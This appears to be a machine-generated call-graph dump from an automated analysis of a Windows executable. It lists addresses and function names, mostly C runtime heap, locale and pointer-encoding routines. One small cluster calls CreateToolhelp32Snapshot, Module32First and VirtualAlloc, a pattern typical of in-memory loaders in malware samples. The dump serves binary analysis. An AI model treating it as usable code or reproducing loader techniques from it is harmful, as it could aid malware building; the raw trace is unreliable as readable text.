12029->12027 12030 40a06f 12031 40fccf __amsg_exit 3 API calls 12030->12031 12032 40a07a __wwincmdln 12030->12032 12031->12032 12033 40a0a9 12032->12033 12096 40ff3f 12032->12096 12099 40ff6b 12033->12099 12036 40a0ae _realloc 12038 409ffc 12037->12038 12038->12009 12090 409f60 12038->12090 12043 40dc05 __crt_waiting_on_module_handle 12039->12043 12040 40dd78 12109 40d90f 12040->12109 12042 40a00e 12042->12013 12042->12014 12043->12040 12043->12042 12102 40ff89 12043->12102 12046 40d7e5 __encode_pointer RtlEncodePointer 12047 40dcd2 12046->12047 12048 40d7e5 __encode_pointer RtlEncodePointer 12047->12048 12049 40dce2 12048->12049 12050 40d7e5 __encode_pointer RtlEncodePointer 12049->12050 12051 40dcf2 12050->12051 12052 40d7e5 __encode_pointer RtlEncodePointer 12051->12052 12053 40dd02 __mtinit __decode_pointer 12052->12053 12053->12040 12054 40afea __calloc_crt 3 API calls 12053->12054 12055 40dd3c __decode_pointer 12054->12055 12055->12040 12056 40dd5d 12055->12056 12057 40d94c __mtinit 3 API calls 12056->12057 12057->12042 12059 411b46 _realloc 12058->12059 12060 40afea __calloc_crt 3 API calls 12059->12060 12062 411b67 12060->12062 12061 40afea __calloc_crt 3 API calls 12061->12062 12062->12061 12063 411c4f _realloc __mtinitlocknum 12062->12063 12063->12016 12066 411ae6 12064->12066 12065 411aee 12065->12020 12066->12065 12067 40afa5 __malloc_crt 3 API calls 12066->12067 12068 411b13 _realloc 12067->12068 12068->12020 12070 411a55 _wparse_cmdline 12069->12070 12071 40afa5 __malloc_crt 3 API calls 12070->12071 12072 411aa7 _wparse_cmdline 12070->12072 12071->12072 12072->12022 12074 411818 _wcslen 12073->12074 12078 40a05d 12073->12078 12075 40afea __calloc_crt 3 API calls 12074->12075 12083 41183c __invoke_watson _wcslen 12075->12083 12076 4118a1 12077 40989a _realloc 3 API calls 12076->12077 12077->12078 12078->12027 12078->12029 12079 40afea __calloc_crt 3 API calls 12079->12083 12080 4118c7 12081 40989a _realloc 3 API calls 12080->12081 12081->12078 12083->12076 12083->12078 12083->12079 12083->12080 12119 418a34 12083->12119 12085 40fd9c __IsNonwritableInCurrentImage 12084->12085 12126 40fbec 12085->12126 12087 40fdba __initterm_e 12089 40fdd9 __IsNonwritableInCurrentImage __initterm 12087->12089 12130 40b288 12087->12130 12089->12030 12091 409f73 12090->12091 12092 409f6e 12090->12092 12094 4101e9 __NMSG_WRITE 3 API calls 12091->12094 12093 410394 __FF_MSGBANNER 3 API calls 12092->12093 12093->12091 12095 409f7b _malloc 12094->12095 12095->12009 12189 40fe13 12096->12189 12098 40ff50 12098->12033 12100 40fe13 _doexit 3 API calls 12099->12100 12101 40ff76 12100->12101 12101->12036 12113 40d857 12102->12113 12104 40ff91 __init_pointers __initp_misc_winsig 12116 409d5b 12104->12116 12107 40d7e5 __encode_pointer RtlEncodePointer 12108 40dcc7 12107->12108 12108->12046 12110 40d919 __decode_pointer 12109->12110 12111 40dec2 12110->12111 12112 40989a _realloc 3 API calls 12110->12112 12111->12042 12112->12110 12114 40d7e5 __encode_pointer RtlEncodePointer 12113->12114 12115 40d85e 12114->12115 12115->12104 12117 40d7e5 __encode_pointer RtlEncodePointer 12116->12117 12118 409d65 12117->12118 12118->12107 12120 418a45 12119->12120 12121 418a4c 12119->12121 12120->12121 12124 418a78 12120->12124 12122 40b118 _realloc 3 API calls 12121->12122 12123 418a51 strtoxl 12122->12123 12123->12083 12124->12123 12125 40b118 _realloc 3 API calls 12124->12125 12125->12123 12127 40fbf2 12126->12127 12128 40d7e5 __encode_pointer RtlEncodePointer 12127->12128 12129 40fc0a 12127->12129 12128->12127 12129->12087 12133 40b24c 12130->12133 12132 40b295 12132->12089 12134 40b258 _realloc 12133->12134 12139 40fd3b 12134->12139 12138 40b269 __cinit _realloc 12138->12132 12140 40dfbf __lock 3 API calls 12139->12140 12141 40b25d 12140->12141 12142 40b161 12141->12142 12143 40b175 __decode_pointer 12142->12143 12151 40b208 12143->12151 12156 4130dc 12143->12156 12145 40b1a3 12150 40b1c7 12145->12150 12155 40b1ef 12145->12155 12163 40b036 12145->12163 12146 40d7e5 __encode_pointer RtlEncodePointer 12147 40b1fd 12146->12147 12148 40d7e5 __encode_pointer RtlEncodePointer 12147->12148 12148->12151 12150->12151 12152 40b036 __realloc_crt 3 API calls 12150->12152 12153 40b1dd 12150->12153 12151->12138 12152->12153 12153->12151 12154 40d7e5 __encode_pointer RtlEncodePointer 12153->12154 12154->12155 12155->12146 12157 4130e8 _realloc 12156->12157 12158 413115 12157->12158 12159 4130f8 12157->12159 12161 4130fd strtoxl _realloc __msize ___sbh_find_block 12158->12161 12162 40dfbf __lock 3 API calls 12158->12162 12160 40b118 _realloc 3 API calls 12159->12160 12160->12161 12161->12145 12162->12161 12166 40b03f 12163->12166 12165 40b07e 12165->12150 12166->12165 12167 412e46 12166->12167 12168 412e52 _realloc 12167->12168 12169 412e67 12168->12169 12170 412e59 12168->12170 12171 412e7a 12169->12171 12172 412e6e 12169->12172 12173 40d2b2 _malloc 3 API calls 12170->12173 12175 412fec _realloc 12171->12175 12186 412e87 ___sbh_alloc_block ___sbh_free_block _realloc ___sbh_resize_block ___sbh_find_block 12171->12186 12174 40989a _realloc 3 API calls 12172->12174 12176 412e61 _realloc 12173->12176 12174->12176 12175->12176 12177 41301f _realloc 12175->12177 12180 413043 12175->12180 12182 413039 12175->12182 12176->12166 12179 40b118 _realloc 3 API calls 12177->12179 12178 40dfbf __lock 3 API calls 12178->12186 12179->12176 12180->12176 12181 40b118 _realloc 3 API calls 12180->12181 12181->12176 12183 40b118 _realloc 3 API calls 12182->12183 12183->12176 12184 412fd2 12184->12176 12185 40b118 _realloc 3 API calls 12184->12185 12185->12176 12186->12176 12186->12177 12186->12178 12186->12184 12187 412fb5 12186->12187 12188 40b118 _realloc 3 API calls 12187->12188 12188->12176 12190 40fe1f _realloc 12189->12190 12191 40dfbf __lock 3 API calls 12190->12191 12193 40fe26 __decode_pointer 12191->12193 12192 40fedf _doexit _realloc _malloc __initterm 12192->12098 12193->12192 12194 40d857 RtlEncodePointer _doexit 12193->12194 12194->12193 13652 416f8b 13655 416e1f 13652->13655 13654 416fa3 13656 416e36 13655->13656 13657 416e77 13656->13657 13658 416e5c 13656->13658 13661 416e3a strtoxl 13656->13661 13660 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13657->13660 13659 40b118 _realloc 3 API calls 13658->13659 13659->13661 13662 416e82 13660->13662 13661->13654 13664 416ed2 _memset 13662->13664 13665 416e9c _memset 13662->13665 13663 40b118 _realloc 3 API calls 13666 416eb4 13663->13666 13664->13661 13667 40b118 _realloc 3 API calls 13664->13667 13665->13661 13665->13663 13668 40b118 _realloc 3 API calls 13666->13668 13667->13661 13668->13661 13025 40c50f 13026 40c544 13025->13026 13027 40daac __getptd 3 API calls 13026->13027 13033 40c54c __CallSettingFrame@12 13027->13033 13028 40c5c1 13029 40c5e6 FindHandler 3 API calls 13028->13029 13031 40c5cd 13029->13031 13030 409d23 CallUnexpected 3 API calls 13030->13033 13032 40c5d7 _realloc 13031->13032 13034 409d23 CallUnexpected 3 API calls 13031->13034 13033->13028 13033->13030 13034->13032 13503 409b1a 13504 40daac __getptd 3 API calls 13503->13504 13505 409b1f 13504->13505 13506 409b3a 13505->13506 13507 40b68c _localeconv 3 API calls 13505->13507 13507->13506 13240 40b21b 13241 40afea __calloc_crt 3 API calls 13240->13241 13242 40b227 13241->13242 13243 40d7e5 __encode_pointer RtlEncodePointer 13242->13243 13244 40b22f 13243->13244 13245 40a61b 13246 40a629 13245->13246 13247 40a63b 13245->13247 13250 40a5ca 13247->13250 13251 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13250->13251 13252 40a5dd 13251->13252 13253 40a5f7 13252->13253 13254 41277c __isctype_l 3 API calls 13252->13254 13254->13253 13305 40f29d 13308 40f111 13305->13308 13309 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13308->13309 13310 40f125 13309->13310 13317 417db2 13310->13317 13312 40f131 13313 40f145 13312->13313 13314 40a719 __hextodec 3 API calls 13312->13314 13315 417db2 __forcdecpt_l 4 API calls 13313->13315 13314->13312 13316 40f14e 13315->13316 13318 417dd0 13317->13318 13319 417dc0 13317->13319 13321 417c9d 13318->13321 13319->13312 13322 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13321->13322 13323 417cb2 13322->13323 13324 417d12 13323->13324 13325 417cbe 13323->13325 13326 417d37 13324->13326 13327 416fa8 __isleadbyte_l 3 API calls 13324->13327 13329 41277c __isctype_l 3 API calls 13325->13329 13332 417cd6 13325->13332 13328 40b118 _realloc 3 API calls 13326->13328 13330 417d3d 13326->13330 13327->13326 13328->13330 13329->13332 13331 40a55c ___crtLCMapStringA 4 API calls 13330->13331 13331->13332 13332->13319 13035 401920 13036 401923 13035->13036 13037 40194a Sleep 13036->13037 13038 401965 13037->13038 13039 40156b 9 API calls 13038->13039 13040 401976 13038->13040 13039->13040 13333 4092a5 13334 4092bd _memset 13333->13334 13337 4092b9 strtoxl _realloc 13333->13337 13335 4092c2 13334->13335 13334->13337 13338 40930c 13334->13338 13336 40b118 _realloc 3 API calls 13335->13336 13336->13337 13338->13337 13339 40b118 _realloc 3 API calls 13338->13339 13339->13337 13508 409326 13509 409336 13508->13509 13510 409340 strtoxl 13508->13510 13511 40933b 13509->13511 13513 40935b 13509->13513 13512 40b118 _realloc 3 API calls 13511->13512 13512->13510 13513->13510 13514 40b118 _realloc 3 API calls 13513->13514 13514->13510 12529 417026 12530 417030 12529->12530 12531 417049 12530->12531 12533 416ff3 12530->12533 12534 416ff9 12533->12534 12535 417004 12534->12535 12537 40ee59 12534->12537 12535->12530 12558 416dd7 12537->12558 12539 40ee69 12540 40ee74 12539->12540 12541 40ee8b 12539->12541 12543 40b118 _realloc 3 API calls 12540->12543 12542 40ee8f 12541->12542 12548 40ee9c _vscanf 12541->12548 12544 40b118 _realloc 3 API calls 12542->12544 12545 40ee79 12543->12545 12544->12545 12545->12535 12546 40ef8c 12549 416c4e __locking 3 API calls 12546->12549 12547 40ef0c 12550 40ef23 12547->12550 12553 40ef40 12547->12553 12548->12545 12554 40eef2 12548->12554 12557 40eefd 12548->12557 12562 416d73 12548->12562 12549->12545 12572 416c4e 12550->12572 12553->12545 12593 416402 12553->12593 12554->12557 12569 416d2a 12554->12569 12557->12546 12557->12547 12559 416de6 12558->12559 12561 416deb strtoxl 12558->12561 12560 40b118 _realloc 3 API calls 12559->12560 12560->12561 12561->12539 12563 416d80 12562->12563 12564 416d8f 12562->12564 12565 40b118 _realloc 3 API calls 12563->12565 12567 40b118 _realloc 3 API calls 12564->12567 12568 416da3 strtoxl 12564->12568 12566 416d85 12565->12566 12566->12554 12567->12568 12568->12554 12570 40afa5 __malloc_crt 3 API calls 12569->12570 12571 416d3f 12570->12571 12571->12557 12573 416c5a _realloc 12572->12573 12574 416c62 12573->12574 12575 416c7d 12573->12575 12577 40b12b __write_nolock 3 API calls 12574->12577 12576 416c8b 12575->12576 12581 416ccc 12575->12581 12578 40b12b __write_nolock 3 API calls 12576->12578 12579 416c67 12577->12579 12580 416c90 12578->12580 12582 40b118 _realloc 3 API calls 12579->12582 12583 40b118 _realloc 3 API calls 12580->12583 12619 419030 12581->12619 12591 416c6f __locking strtoxl _realloc 12582->12591 12583->12591 12585 416cd2 12586 416cf5 12585->12586 12587 416cdf 12585->12587 12588 40b118 _realloc 3 API calls 12586->12588 12623 41651b 12587->12623 12590 416cfa 12588->12590 12592 40b12b __write_nolock 3 API calls 12590->12592 12591->12545 12592->12591 12594 41640e _realloc 12593->12594 12595 41643b 12594->12595 12596 41641f 12594->12596 12598 416449 12595->12598 12601 41646a 12595->12601 12597 40b12b __write_nolock 3 API calls 12596->12597 12600 416424 12597->12600 12599 40b12b __write_nolock 3 API calls 12598->12599 12602 41644e 12599->12602 12605 40b118 _realloc 3 API calls 12600->12605 12603 4164b0 12601->12603 12604 41648a 12601->12604 12606 40b118 _realloc 3 API calls 12602->12606 12608 419030 ___lock_fhandle 3 API calls 12603->12608 12607 40b12b __write_nolock 3 API calls 12604->12607 12616 41642c strtoxl _realloc __lseeki64 12605->12616 12606->12616 12610 41648f 12607->12610 12609 4164b6 12608->12609 12611 4164c3 12609->12611 12612 4164df 12609->12612 12613 40b118 _realloc 3 API calls 12610->12613 12614 41637d __lseeki64_nolock 3 API calls 12611->12614 12615 40b118 _realloc 3 API calls 12612->12615 12613->12616 12614->12616 12617 4164e4 12615->12617 12616->12545 12618 40b12b __write_nolock 3 API calls 12617->12618 12618->12616 12620 41903c _realloc 12619->12620 12621 419068 ___lock_fhandle _realloc __mtinitlocknum 12620->12621 12622 40dfbf __lock 3 API calls 12620->12622 12621->12585 12622->12621 12624 41652a __write_nolock 12623->12624 12625 416583 12624->12625 12626 41655c 12624->12626 12639 416551 strtoxl ___strgtold12_l 12624->12639 12628 4165eb 12625->12628 12629 4165c5 12625->12629 12627 40b12b __write_nolock 3 API calls 12626->12627 12630 416561 12627->12630 12632 4165ff 12628->12632 12656 41637d 12628->12656 12631 40b12b __write_nolock 3 API calls 12629->12631 12633 40b118 _realloc 3 API calls 12630->12633 12635 4165ca 12631->12635 12634 416d73 __write_nolock 3 API calls 12632->12634 12633->12639 12637 41660a 12634->12637 12638 40b118 _realloc 3 API calls 12635->12638 12640 40daac __getptd 3 API calls 12637->12640 12644 416892 12637->12644 12638->12639 12639->12591 12654 416625 __putwch_nolock 12640->12654 12641 416bfd 12641->12639 12642 40b118 _realloc 3 API calls 12641->12642 12643 416c20 12642->12643 12646 40b12b __write_nolock 3 API calls 12643->12646 12644->12639 12644->12641 12645 416bd0 12644->12645 12647 416bdb 12645->12647 12648 416bef 12645->12648 12646->12639 12650 40b118 _realloc 3 API calls 12647->12650 12649 40b13e __dosmaperr 3 API calls 12648->12649 12649->12639 12651 416be0 12650->12651 12652 40b12b __write_nolock 3 API calls 12651->12652 12652->12639 12654->12644 12655 4189dc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __fassign 12654->12655 12664 416fe0 12654->12664 12655->12654 12667 418fb9 12656->12667 12658 41639b 12659 4163a3 12658->12659 12662 4163b4 12658->12662 12660 40b118 _realloc 3 API calls 12659->12660 12661 4163a8 12660->12661 12661->12632 12662->12661 12663 40b13e __dosmaperr 3 API calls 12662->12663 12663->12661 12665 416fa8 __isleadbyte_l 3 API calls 12664->12665 12666 416fef 12665->12666 12666->12654 12668 418fc6 12667->12668 12669 418fde 12667->12669 12670 40b12b __write_nolock 3 API calls 12668->12670 12671 40b12b __write_nolock 3 API calls 12669->12671 12677 419013 strtoxl 12669->12677 12672 418fcb 12670->12672 12673 41900c 12671->12673 12674 40b118 _realloc 3 API calls 12672->12674 12675 40b118 _realloc 3 API calls 12673->12675 12676 418fd3 12674->12676 12675->12677 12676->12658 12677->12658 12678 40c82b 12681 40c601 12678->12681 12680 40c833 12682 40c643 12681->12682 12683 40c60b 12681->12683 12682->12680 12683->12682 12684 40daac __getptd 3 API calls 12683->12684 12685 40c637 12684->12685 12685->12680 13136 40c5ac 13138 40c557 __CallSettingFrame@12 13136->13138 13137 40c5c1 13139 40c5e6 FindHandler 3 API calls 13137->13139 13138->13137 13140 409d23 CallUnexpected 3 API calls 13138->13140 13141 40c5cd 13139->13141 13140->13138 13142 40c5d7 _realloc 13141->13142 13143 409d23 CallUnexpected 3 API calls 13141->13143 13143->13142 11542 8c5978 11543 8c5987 11542->11543 11546 8c6118 11543->11546 11547 8c6133 11546->11547 11548 8c613c CreateToolhelp32Snapshot 11547->11548 11549 8c6158 Module32First 11547->11549 11548->11547 11548->11549 11550 8c5990 11549->11550 11551 8c6167 11549->11551 11553 8c5dd7 11551->11553 11554 8c5e02 11553->11554 11555 8c5e4b 11554->11555 11556 8c5e13 VirtualAlloc 11554->11556 11555->11555 11556->11555 12686 413835 12687 41384b 12686->12687 12690 41385f 12686->12690 12688 40afea __calloc_crt 3 API calls 12687->12688 12689 413857 12688->12689 12689->12690 12696 413285 12689->12696 12692 41386b 12692->12690 12693 4136a0 ___free_lc_time 3 API calls 12692->12693 12694 413875 12693->12694 12695 40989a _realloc 3 API calls 12694->12695 12695->12690 12697 4132a4 12696->12697 12698 41329f 12696->12698 12699 412a30 ___getlocaleinfo 3 API calls 12697->12699 12698->12692 12700 4132c1 12699->12700 12701 412a30 ___getlocaleinfo 3 API calls 12700->12701 12702 4132d6 12701->12702 12703 412a30 ___getlocaleinfo 3 API calls 12702->12703 12704 4132eb 12703->12704 12705 412a30 ___getlocaleinfo 3 API calls 12704->12705 12706 413300 12705->12706 12707 412a30 ___getlocaleinfo 3 API calls 12706->12707 12708 413318 12707->12708 12709 412a30 ___getlocaleinfo 3 API calls 12708->12709 12710 41332d 12709->12710 12711 412a30 ___getlocaleinfo 3 API calls 12710->12711 12712 41333f 12711->12712 12713 412a30 ___getlocaleinfo 3 API calls 12712->12713 12714 413354 12713->12714 12715 412a30 ___getlocaleinfo 3 API calls 12714->12715 12716 41336c 12715->12716 12717 412a30 ___getlocaleinfo 3 API calls 12716->12717 12718 413381 12717->12718 12719 412a30 ___getlocaleinfo 3 API calls 12718->12719 12720 413396 12719->12720 12721 412a30 ___getlocaleinfo 3 API calls 12720->12721 12722 4133ab 12721->12722 12723 412a30 ___getlocaleinfo 3 API calls 12722->12723 12724 4133c3 12723->12724 12725 412a30 ___getlocaleinfo 3 API calls 12724->12725 12726 4133d8 12725->12726 12727 412a30 ___getlocaleinfo 3 API calls 12726->12727 12728 4133ed 12727->12728 12729 412a30 ___getlocaleinfo 3 API calls 12728->12729 12730 413402 12729->12730 12731 412a30 ___getlocaleinfo 3 API calls 12730->12731 12732 41341a 12731->12732 12733 412a30 ___getlocaleinfo 3 API calls 12732->12733 12734 41342f 12733->12734 12735 412a30 ___getlocaleinfo 3 API calls 12734->12735 12736 413444 12735->12736 12737 412a30 ___getlocaleinfo 3 API calls 12736->12737 12738 413459 12737->12738 12739 412a30 ___getlocaleinfo 3 API calls 12738->12739 12740 413471 12739->12740 12741 412a30 ___getlocaleinfo 3 API calls 12740->12741 12742 413486 12741->12742 12743 412a30 ___getlocaleinfo 3 API calls 12742->12743 12744 41349b 12743->12744 12745 412a30 ___getlocaleinfo 3 API calls 12744->12745 12746 4134b0 12745->12746 12747 412a30 ___getlocaleinfo 3 API calls 12746->12747 12748 4134c8 12747->12748 12749 412a30 ___getlocaleinfo 3 API calls 12748->12749 12750 4134dd 12749->12750 12751 412a30 ___getlocaleinfo 3 API calls 12750->12751 12752 4134f2 12751->12752 12753 412a30 ___getlocaleinfo 3 API calls 12752->12753 12754 413507 12753->12754 12755 412a30 ___getlocaleinfo 3 API calls 12754->12755 12756 41351f 12755->12756 12757 412a30 ___getlocaleinfo 3 API calls 12756->12757 12758 413534 12757->12758 12759 412a30 ___getlocaleinfo 3 API calls 12758->12759 12760 413549 12759->12760 12761 412a30 ___getlocaleinfo 3 API calls 12760->12761 12762 41355e 12761->12762 12763 412a30 ___getlocaleinfo 3 API calls 12762->12763 12764 413579 12763->12764 12765 412a30 ___getlocaleinfo 3 API calls 12764->12765 12766 413591 12765->12766 12767 412a30 ___getlocaleinfo 3 API calls 12766->12767 12768 4135a9 12767->12768 12769 412a30 ___getlocaleinfo 3 API calls 12768->12769 12770 4135c1 12769->12770 12771 412a30 ___getlocaleinfo 3 API calls 12770->12771 12772 4135dc 12771->12772 12773 412a30 ___getlocaleinfo 3 API calls 12772->12773 12774 4135f4 12773->12774 12775 412a30 ___getlocaleinfo 3 API calls 12774->12775 12776 41360c 12775->12776 12777 412a30 ___getlocaleinfo 3 API calls 12776->12777 12778 413624 12777->12778 12779 412a30 ___getlocaleinfo 3 API calls 12778->12779 12780 41363f 12779->12780 12781 412a30 ___getlocaleinfo 3 API calls 12780->12781 12782 413657 12781->12782 12783 412a30 ___getlocaleinfo 3 API calls 12782->12783 12784 413672 12783->12784 12785 412a30 ___getlocaleinfo 3 API calls 12784->12785 12786 41368f 12785->12786 12786->12692 12787 40c834 12788 40daac __getptd 3 API calls 12787->12788 12789 40c83c 12788->12789 12790 40c520 FindHandler 3 API calls 12789->12790 12791 40c88c 12790->12791 12792 40c8c1 FindHandlerForForeignException 3 API calls 12791->12792 12793 40c8ad _realloc 12792->12793 12979 409cb4 12980 409cbe __fpmath __cfltcvt_init 12979->12980 12981 409cd3 12980->12981 12983 40fc0d 12980->12983 12986 418248 12983->12986 12985 40fc22 __invoke_watson 12985->12981 12987 418263 __control87 12986->12987 12989 41827d strtoxl __control87 12986->12989 12988 40b118 _realloc 3 API calls 12987->12988 12988->12989 12989->12985 12794 409c36 12797 40f089 12794->12797 12796 409c4f 12798 40f0b3 12797->12798 12799 40f096 12797->12799 12801 40f0c0 12798->12801 12802 40f0cd 12798->12802 12800 40b118 _realloc 3 API calls 12799->12800 12805 40f09b strtoxl 12800->12805 12803 40b118 _realloc 3 API calls 12801->12803 12808 40efbd 12802->12808 12803->12805 12805->12796 12806 40f0e4 12806->12805 12807 40b118 _realloc 3 API calls 12806->12807 12807->12805 12809 40efcd 12808->12809 12811 40efed 12808->12811 12810 40b118 _realloc 3 API calls 12809->12810 12815 40efd2 strtoxl 12810->12815 12812 40effd 12811->12812 12814 40f01a 12811->12814 12813 40b118 _realloc 3 API calls 12812->12813 12813->12815 12814->12815 12816 40ee59 __flsbuf 3 API calls 12814->12816 12815->12806 12816->12815 11564 4121b6 11569 41213a 11564->11569 11566 4121e1 setSBCS ___strgtold12_l 11568 4121d6 _memset __setmbcp_nolock 11568->11566 11572 411f03 11568->11572 11580 40a130 11569->11580 11574 411f2a _memset 11572->11574 11579 411fe9 ___strgtold12_l 11574->11579 11911 4129ee 11574->11911 11578 40a55c ___crtLCMapStringA 4 API calls 11578->11579 11579->11568 11581 40a143 11580->11581 11586 40a190 11580->11586 11588 40daac 11581->11588 11584 40a170 11584->11586 11606 412096 11584->11606 11586->11568 11616 40da33 11588->11616 11591 40a148 11591->11584 11593 40b68c 11591->11593 11594 40b698 _realloc 11593->11594 11595 40daac __getptd 3 API calls 11594->11595 11596 40b69d 11595->11596 11597 40b6cb 11596->11597 11599 40b6af 11596->11599 11598 40dfbf __lock 3 API calls 11597->11598 11600 40b6d2 11598->11600 11601 40daac __getptd 3 API calls 11599->11601 11765 40b64e 11600->11765 11603 40b6b4 _localeconv 11601->11603 11604 40b6c2 _realloc 11603->11604 11605 40fccf __amsg_exit 3 API calls 11603->11605 11604->11584 11605->11604 11607 4120a2 _realloc 11606->11607 11608 40daac __getptd 3 API calls 11607->11608 11609 4120a7 11608->11609 11610 40dfbf __lock 3 API calls 11609->11610 11611 4120b9 _LocaleUpdate::_LocaleUpdate 11609->11611 11614 4120d7 11610->11614 11612 4120c7 _realloc 11611->11612 11613 40fccf __amsg_exit 3 API calls 11611->11613 11612->11586 11613->11612 11614->11611 11615 40989a _realloc 3 API calls 11614->11615 11615->11611 11617 40da3d ___set_flsgetvalue 11616->11617 11624 40da87 11617->11624 11630 40afea 11617->11630 11619 40da5e __decode_pointer 11620 40da97 11619->11620 11621 40da7f 11619->11621 11619->11624 11640 40989a 11620->11640 11634 40d94c 11621->11634 11624->11591 11625 40fccf 11624->11625 11626 410394 __FF_MSGBANNER 3 API calls 11625->11626 11627 40fcd9 11626->11627 11628 4101e9 __NMSG_WRITE 3 API calls 11627->11628 11629 40fce1 __decode_pointer 11628->11629 11629->11591 11633 40aff3 11630->11633 11632 40b030 11632->11619 11633->11632 11646 412d28 11633->11646 11635 40d958 _realloc __crt_waiting_on_module_handle 11634->11635 11636 40dfbf __lock 3 API calls 11635->11636 11637 40d9c9 __mtinit 11636->11637 11638 40dfbf __lock 3 API calls 11637->11638 11639 40d9ea __mtinit ___addlocaleref _realloc 11638->11639 11639->11624 11641 4098a6 _realloc 11640->11641 11642 409911 _realloc 11641->11642 11643 40dfbf __lock 3 API calls 11641->11643 11645 4098bd ___sbh_free_block _realloc ___sbh_find_block 11641->11645 11642->11624 11643->11645 11644 40b118 _realloc 3 API calls 11644->11642 11645->11642 11645->11644 11647 412d34 _realloc 11646->11647 11648 412d4c 11647->11648 11651 412d6b _memset ___sbh_alloc_block _realloc __calloc_impl 11647->11651 11654 40b118 11648->11654 11650 412ddd RtlAllocateHeap 11650->11651 11651->11650 11653 412d51 strtoxl _realloc 11651->11653 11657 40dfbf 11651->11657 11653->11633 11655 40da33 __getptd_noexit 3 API calls 11654->11655 11656 40b11d 11655->11656 11656->11653 11658 40dfd4 11657->11658 11662 40dfe6 11657->11662 11663 40defc 11658->11663 11660 40dfda 11661 40fccf __amsg_exit 3 API calls 11660->11661 11660->11662 11661->11662 11662->11651 11664 40df08 _realloc 11663->11664 11666 40df24 _malloc 11664->11666 11683 410394 11664->11683 11671 40df3e _realloc __mtinitlocknum 11666->11671 11710 40afa5 11666->11710 11671->11660 11672 40df50 11674 40b118 _realloc 3 API calls 11672->11674 11673 40df5f 11675 40dfbf __lock 3 API calls 11673->11675 11674->11671 11676 40df66 11675->11676 11677 40df9a 11676->11677 11679 40df6e __mtinitlocknum 11676->11679 11678 40989a _realloc 3 API calls 11677->11678 11678->11671 11679->11671 11680 40989a _realloc 3 API calls 11679->11680 11681 40df85 11680->11681 11682 40b118 _realloc 3 API calls 11681->11682 11682->11671 11714 41842c 11683->11714 11685 41039b 11686 41842c __set_error_mode 3 API calls 11685->11686 11688 4103a8 11685->11688 11686->11688 11687 4101e9 __NMSG_WRITE 3 API calls 11689 4103c0 11687->11689 11688->11687 11690 40df1d 11688->11690 11691 4101e9 __NMSG_WRITE 3 API calls 11689->11691 11692 4101e9 11690->11692 11691->11690 11693 4101fd 11692->11693 11694 410358 _strlen 11693->11694 11695 41842c __set_error_mode 3 API calls 11693->11695 11694->11666 11696 41021f 11695->11696 11696->11694 11697 41842c __set_error_mode 3 API calls 11696->11697 11698 410230 11697->11698 11698->11694 11718 40d1fb 11698->11718 11700 410264 __invoke_watson 11701 40d1fb _strcpy_s 3 API calls 11700->11701 11702 4102a6 __invoke_watson _strlen 11700->11702 11701->11702 11707 4102e9 __invoke_watson 11702->11707 11725 413e88 11702->11725 11705 41030f __invoke_watson 11706 413e14 _strcat_s 3 API calls 11705->11706 11708 410334 __invoke_watson 11706->11708 11732 413e14 11707->11732 11739 4182c3 11708->11739 11713 40afae 11710->11713 11712 40afe4 11712->11672 11712->11673 11713->11712 11752 40d2b2 11713->11752 11715 41843b 11714->11715 11716 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11715->11716 11717 418445 strtoxl 11715->11717 11716->11717 11717->11685 11719 40d213 11718->11719 11720 40d20c 11718->11720 11721 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11719->11721 11720->11719 11722 40d239 11720->11722 11724 40d218 strtoxl 11721->11724 11723 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11722->11723 11722->11724 11723->11724 11724->11700 11729 413e9a 11725->11729 11726 413e9e 11727 413ea3 strtoxl 11726->11727 11728 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11726->11728 11727->11707 11728->11727 11729->11726 11729->11727 11730 413ee4 11729->11730 11730->11727 11731 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11730->11731 11731->11727 11733 413e2c 11732->11733 11735 413e25 11732->11735 11734 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11733->11734 11736 413e31 strtoxl 11734->11736 11735->11733 11737 413e60 11735->11737 11736->11705 11737->11736 11738 40b118 _realloc RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 11737->11738 11738->11736 11740 40d857 _doexit RtlEncodePointer 11739->11740 11741 4182d3 11740->11741 11742 41836e __decode_pointer 11741->11742 11743 40d7e5 __encode_pointer RtlEncodePointer 11741->11743 11742->11694 11744 418317 11743->11744 11745 40d7e5 __encode_pointer RtlEncodePointer 11744->11745 11746 41832c 11745->11746 11747 40d7e5 __encode_pointer RtlEncodePointer 11746->11747 11748 418341 11747->11748 11749 40d7e5 __encode_pointer RtlEncodePointer 11748->11749 11750 418356 11749->11750 11750->11742 11751 40d7e5 __encode_pointer RtlEncodePointer 11750->11751 11751->11742 11753 40d365 _realloc 11752->11753 11759 40d2c4 _realloc _malloc 11752->11759 11755 40b118 _realloc RtlEncodePointer RtlAllocateHeap 11753->11755 11754 410394 __FF_MSGBANNER RtlEncodePointer RtlAllocateHeap 11754->11759 11764 40d35d 11755->11764 11756 40d263 _malloc RtlEncodePointer RtlAllocateHeap 11756->11759 11757 4101e9 __NMSG_WRITE RtlEncodePointer RtlAllocateHeap 11757->11759 11758 40d321 RtlAllocateHeap 11758->11759 11759->11754 11759->11756 11759->11757 11759->11758 11760 40d351 11759->11760 11762 40d356 11759->11762 11759->11764 11761 40b118 _realloc RtlEncodePointer RtlAllocateHeap 11760->11761 11761->11762 11763 40b118 _realloc RtlEncodePointer RtlAllocateHeap 11762->11763 11763->11764 11764->11713 11766 40b652 ___addlocaleref ___removelocaleref 11765->11766 11768 40b684 11765->11768 11766->11768 11769 40b3b7 11766->11769 11768->11603 11770 40b43b 11769->11770 11771 40b3ce 11769->11771 11772 40b488 11770->11772 11773 40989a _realloc 3 API calls 11770->11773 11771->11770 11778 40b402 11771->11778 11783 40989a _realloc 3 API calls 11771->11783 11779 40b4af 11772->11779 11823 4136a0 11772->11823 11775 40b45c 11773->11775 11776 40989a _realloc 3 API calls 11775->11776 11780 40b46f 11776->11780 11785 40989a _realloc 3 API calls 11778->11785 11798 40b423 11778->11798 11782 40b4f4 11779->11782 11786 40989a RtlAllocateHeap RtlEncodePointer 